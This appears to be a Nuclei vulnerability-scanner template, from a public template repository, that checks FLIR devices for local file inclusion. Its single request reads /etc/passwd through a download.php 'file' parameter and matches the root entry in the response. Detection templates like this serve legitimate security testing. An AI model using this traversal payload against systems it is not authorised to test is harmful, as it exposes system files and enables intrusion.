nuclei-templates/http/vulnerabilities/other/flir-path-traversal.yaml

34 lines
660 B
YAML
Raw Normal View History

2021-05-16 04:54:40 +00:00
id: flir-path-traversal
info:
name: Flir - Local File Inclusion
2021-05-16 04:54:40 +00:00
author: pikpikcu
severity: high
description: Flir is vulnerable to local file inclusion.
reference:
- https://juejin.cn/post/6961370156484263972
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-05-16 04:54:40 +00:00
tags: flir,lfi
metadata:
max-request: 1
2021-05-16 04:54:40 +00:00
http:
2021-05-16 04:54:40 +00:00
- method: GET
path:
- "{{BaseURL}}/download.php?file=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2021-05-16 04:54:40 +00:00
condition: and
- type: status
status:
- 200